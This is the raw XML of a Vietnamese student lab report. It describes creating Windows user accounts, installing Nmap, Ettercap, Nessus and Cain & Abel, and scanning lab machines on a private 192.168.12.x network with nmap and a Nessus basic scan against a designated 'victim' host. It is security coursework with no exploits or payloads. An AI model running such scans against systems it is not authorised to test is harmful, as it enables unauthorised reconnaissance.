          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client2 – cli2 (</w:t>
      </w:r>
      <w:r w:rsidR="00211A8A" w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ký tự)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32784CE5" w14:textId="77777777" w:rsidR="00211A8A" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Client3 – cli3 ( 4 ký tự)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DEC036" w14:textId="03ECE776" w:rsidR="00C0060B" w:rsidRPr="007504E3" w:rsidRDefault="00C0060B" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các bước tạo user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05400D76" w14:textId="3D68E4C4" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chuột phải vào My Computer trên desktop &gt; Manage (hộp thoại dưới sẽ hiện lên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1CF630" w14:textId="71532314" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn Local Users and Groups &gt; Users &gt; Chuột phải Users &gt; New User…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040CA39" w14:textId="62B1139F" w:rsidR="008B261F" w:rsidRPr="004A3141" w:rsidRDefault="007504E3" w:rsidP="00211A8A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</w:t>
      </w:r>
      <w:r w:rsidR="008B261F" w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D2338E" wp14:editId="0565AB5F">
            <wp:extent cx="3497580" cy="2627295"/>
            <wp:effectExtent l="0" t="0" r="7620" b="190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180" cy="26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9428" w14:textId="312E9E49" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Điền thông tin &gt; chỉ tick vào ô password never expires </w:t>
      </w:r>
      <w:r w:rsidR="00AD737A" w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; Create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AAD90" w14:textId="2889B9AB" w:rsidR="008B261F" w:rsidRPr="004A3141" w:rsidRDefault="007504E3" w:rsidP="008B261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</w:t>
      </w:r>
      <w:r w:rsidR="00AD737A" w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AED89FA" wp14:editId="5B531372">
            <wp:extent cx="3512820" cy="263461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72BF" w14:textId="3F647797" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="00AD737A" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tương tự với các user còn lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4CC3C9" w14:textId="6B1DE633" w:rsidR="00AD737A" w:rsidRPr="004A3141" w:rsidRDefault="007504E3" w:rsidP="008B261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       </w:t>
      </w:r>
      <w:r w:rsidR="00211A8A" w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC4A12A" wp14:editId="0DACC110">
            <wp:extent cx="3573780" cy="268033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815E" w14:textId="77D6B69C" w:rsidR="00211A8A" w:rsidRPr="007504E3" w:rsidRDefault="00211A8A" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Màn hình đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03287390" w14:textId="5967CF57" w:rsidR="00211A8A" w:rsidRPr="004A3141" w:rsidRDefault="007504E3" w:rsidP="008B261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211A8A" w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F058B97" wp14:editId="779CE3F2">
            <wp:extent cx="3558540" cy="266890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A8A" w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D54E9" w14:textId="301F54EC" w:rsidR="00B55F02" w:rsidRPr="004A3141" w:rsidRDefault="00B55F02" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D09B940" w14:textId="3914AC16" w:rsidR="00B55F02" w:rsidRPr="004A3141" w:rsidRDefault="00B55F02" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691A87AE" w14:textId="39D40730" w:rsidR="00B55F02" w:rsidRPr="004A3141" w:rsidRDefault="00B55F02" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16248246" w14:textId="11A675FF" w:rsidR="00B55F02" w:rsidRPr="004A3141" w:rsidRDefault="00B55F02" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0984D0" w14:textId="1A38FCDA" w:rsidR="00B55F02" w:rsidRPr="004A3141" w:rsidRDefault="00B55F02" w:rsidP="008B261F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E47E51" w14:textId="358A29DD" w:rsidR="00B55F02" w:rsidRDefault="002365D6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002365D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074E3F2" w14:textId="00F91630" w:rsidR="002365D6" w:rsidRDefault="002365D6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Câu 1: cài đặt chương trình</w:t>
      </w:r>
      <w:r w:rsidR="008367D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4CED4" w14:textId="16C6BB02" w:rsidR="008367D5" w:rsidRPr="008367D5" w:rsidRDefault="008367D5" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap, Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534E865" w14:textId="53BAA9CF" w:rsidR="00191DE6" w:rsidRDefault="008367D5" w:rsidP="007504E3">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA44CD8" wp14:editId="29EE4927">
            <wp:extent cx="5882640" cy="3962613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74" cy="39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7D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B115413" w14:textId="56FBACA7" w:rsidR="00191DE6" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B5744" w14:textId="38668D9D" w:rsidR="001C060A" w:rsidRDefault="001C060A" w:rsidP="001C060A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tải Nessus theo đường dẫn </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00C23592">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.tenable.com/downloads/nessus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; chọn bản  phù hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BE00A" w14:textId="74126D2C" w:rsidR="001C060A" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ở đây em chọn bản </w:t>
      </w:r>
      <w:r w:rsidRPr="001C060A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nessus-8.12.1-debian6_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F325A7" w14:textId="680AD93E" w:rsidR="001C060A" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở terminal tại nơi chứa file .deb &gt; gõ &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001C060A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo dpkg -i Nessus-8.12.1-debian6_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3988D" w14:textId="54401547" w:rsidR="001C060A" w:rsidRPr="001C060A" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397D3AA8" wp14:editId="14400E29">
            <wp:extent cx="537210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647" w14:textId="562B0A7D" w:rsidR="00191DE6" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="001C060A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/systemctl start nessusd.serv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C060A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bật dịnh vụ nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E3141" w14:textId="69DE249C" w:rsidR="001C060A" w:rsidRPr="001C060A" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Vào đường </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00C23592">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://minh:8834/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tiếp tục cấu hình và cài đặt nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE385AB" w14:textId="0A2F69CA" w:rsidR="001C060A" w:rsidRDefault="001C060A" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5027ECAB" wp14:editId="1FA2C07C">
            <wp:extent cx="5943600" cy="11188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1A30" w14:textId="0EA3775F" w:rsidR="001C060A" w:rsidRDefault="00A036E0" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn bản nessus phù hợp &gt; điền active key &gt; đăng nhập bằng tài khoản đã tạo của nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027260B" w14:textId="5CCF0C73" w:rsidR="00A036E0" w:rsidRDefault="00A036E0" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chờ nessus tự động cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D8567" w14:textId="1D5AAC8D" w:rsidR="00A036E0" w:rsidRDefault="00A036E0" w:rsidP="007504E3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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE97C55" wp14:editId="27A4E4C8">
            <wp:extent cx="2446020" cy="26140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9403" cy="26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5126" w14:textId="0A8DC23B" w:rsidR="00B55D29" w:rsidRDefault="00B55D29" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Màn hình Nessues sau khi cài thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B610D4C" w14:textId="3B217366" w:rsidR="00B55D29" w:rsidRDefault="00B55D29" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A14B8E9" wp14:editId="61E84306">
            <wp:extent cx="4899660" cy="26644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4792" cy="26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3CB" w14:textId="7EA9FE03" w:rsidR="00A036E0" w:rsidRDefault="00A036E0" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A82A8CE" w14:textId="2537D694" w:rsidR="00A036E0" w:rsidRDefault="00A036E0" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A036E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cain &amp; Abel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (do linux không hỗ trợ nên em tạo máy ảo mới WinXP cài đặt trên đó)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FA04A" w14:textId="04A4C2E2" w:rsidR="00A036E0" w:rsidRPr="00191DE6" w:rsidRDefault="00A036E0" w:rsidP="00A036E0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                          </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8B51A8" wp14:editId="27391CC7">
            <wp:extent cx="3314700" cy="2486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3017" w14:textId="74D349B9" w:rsidR="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> xác định các dịch vụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA156F8" w14:textId="421496ED" w:rsidR="00191DE6" w:rsidRPr="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -T4 -A 192.168.12.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để scan máy winxp_client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED5671" w14:textId="79376788" w:rsidR="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3"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 wp14:anchorId="5454FF8E" wp14:editId="58BD64DD">
            <wp:extent cx="3916680" cy="3538146"/>
            <wp:effectExtent l="0" t="0" r="762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567" b="89802" l="0" r="89981">
                                  <a14:foregroundMark x1="5630" y1="3258" x2="5916" y2="35977"/>
                                  <a14:foregroundMark x1="5916" y1="35977" x2="5344" y2="17564"/>
                                  <a14:foregroundMark x1="5344" y1="17564" x2="2195" y2="30028"/>
                                  <a14:foregroundMark x1="2195" y1="30028" x2="2767" y2="14306"/>
                                  <a14:foregroundMark x1="2767" y1="14306" x2="573" y2="2833"/>
                                  <a14:foregroundMark x1="573" y1="2833" x2="2576" y2="83003"/>
                                  <a14:foregroundMark x1="2576" y1="83003" x2="10682" y2="86170"/>
                                  <a14:foregroundMark x1="12282" y1="85999" x2="12500" y2="85977"/>
                                  <a14:foregroundMark x1="10124" y1="86222" x2="10685" y2="86164"/>
                                  <a14:foregroundMark x1="12500" y1="85977" x2="23270" y2="86387"/>
                                  <a14:foregroundMark x1="27753" y1="86234" x2="29928" y2="86144"/>
                                  <a14:foregroundMark x1="57374" y1="84793" x2="61124" y2="84305"/>
                                  <a14:foregroundMark x1="47879" y1="86028" x2="57185" y2="84817"/>
                                  <a14:foregroundMark x1="64090" y1="4488" x2="63931" y2="708"/>
                                  <a14:foregroundMark x1="63538" y1="82277" x2="60810" y2="84398"/>
                                  <a14:foregroundMark x1="2053" y1="86033" x2="0" y2="85977"/>
                                  <a14:foregroundMark x1="10640" y1="86268" x2="10260" y2="86258"/>
                                  <a14:foregroundMark x1="23164" y1="86612" x2="12149" y2="86310"/>
                                  <a14:foregroundMark x1="63931" y1="4816" x2="63550" y2="10623"/>
                                  <a14:foregroundMark x1="63454" y1="85694" x2="63454" y2="85694"/>
                                  <a14:foregroundMark x1="63359" y1="86827" x2="63740" y2="86402"/>
                                  <a14:foregroundMark x1="63550" y1="85836" x2="63454" y2="86969"/>
                                  <a14:backgroundMark x1="64629" y1="10779" x2="66317" y2="83428"/>
                                  <a14:backgroundMark x1="62832" y1="86854" x2="58969" y2="90652"/>
                                  <a14:backgroundMark x1="66317" y1="83428" x2="64012" y2="85694"/>
                                  <a14:backgroundMark x1="58969" y1="90652" x2="42080" y2="87252"/>
                                  <a14:backgroundMark x1="42080" y1="87252" x2="36164" y2="88244"/>
                                  <a14:backgroundMark x1="56011" y1="87394" x2="56011" y2="87394"/>
                                  <a14:backgroundMark x1="65267" y1="80312" x2="64599" y2="82861"/>
                                  <a14:backgroundMark x1="62278" y1="86751" x2="55821" y2="88669"/>
                                  <a14:backgroundMark x1="55821" y1="88669" x2="56775" y2="86969"/>
                                  <a14:backgroundMark x1="36069" y1="87960" x2="17271" y2="90510"/>
                                  <a14:backgroundMark x1="17271" y1="90510" x2="2195" y2="86402"/>
                                  <a14:backgroundMark x1="25382" y1="87110" x2="25382" y2="87110"/>
                                  <a14:backgroundMark x1="10878" y1="87394" x2="10878" y2="87394"/>
                                  <a14:backgroundMark x1="25382" y1="87535" x2="27195" y2="87535"/>
                                  <a14:backgroundMark x1="10401" y1="86827" x2="11927" y2="86827"/>
                                  <a14:backgroundMark x1="22996" y1="86969" x2="25668" y2="87535"/>
                                  <a14:backgroundMark x1="64702" y1="10790" x2="65172" y2="14589"/>
                                  <a14:backgroundMark x1="64533" y1="10765" x2="64981" y2="12606"/>
                                  <a14:backgroundMark x1="64313" y1="4533" x2="64283" y2="48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761" r="36225" b="13592"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3933876" cy="355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CF3B" w14:textId="43FEDEBC" w:rsidR="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tương tự sử dụng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -T4 -A 192.168.12.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để scan máy window server 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1037B" w14:textId="77777777" w:rsidR="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B3B44E" w14:textId="6F1F412D" w:rsidR="00191DE6" w:rsidRDefault="00191DE6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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53821662" wp14:editId="7026DCDC">
            <wp:extent cx="5989320" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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9" b="37348"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="598932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43DBB" w14:textId="79956CA8" w:rsidR="00191DE6" w:rsidRDefault="00191DE6" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00191DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sử dụng Nmap và Nessus để scan các vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74767525" w14:textId="5D944DC3" w:rsidR="00C3464D" w:rsidRPr="00C3464D" w:rsidRDefault="00C3464D" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create New Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A8CEC" w14:textId="65F49A37" w:rsidR="00C3464D" w:rsidRDefault="00C3464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 wp14:anchorId="6D3700CC" wp14:editId="7AC1555C">
            <wp:extent cx="3834307" cy="2085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07" cy="20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0A1E" w14:textId="33C8C5AF" w:rsidR="00C3464D" w:rsidRDefault="00C3464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ọn kiểu scan (basic scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F305FB" w14:textId="340014A4" w:rsidR="00C3464D" w:rsidRDefault="00C3464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 wp14:anchorId="5CFC1ECA" wp14:editId="428D099B">
            <wp:extent cx="3844636" cy="2090726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9" cy="20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A7FB" w14:textId="20810DF9" w:rsidR="00C3464D" w:rsidRDefault="00C3464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Điền thông tin địa chỉ ip máy nạn nhân (Winxp_Client, 192.168.12.3/24)</w:t>
      </w:r>
    </w:p>
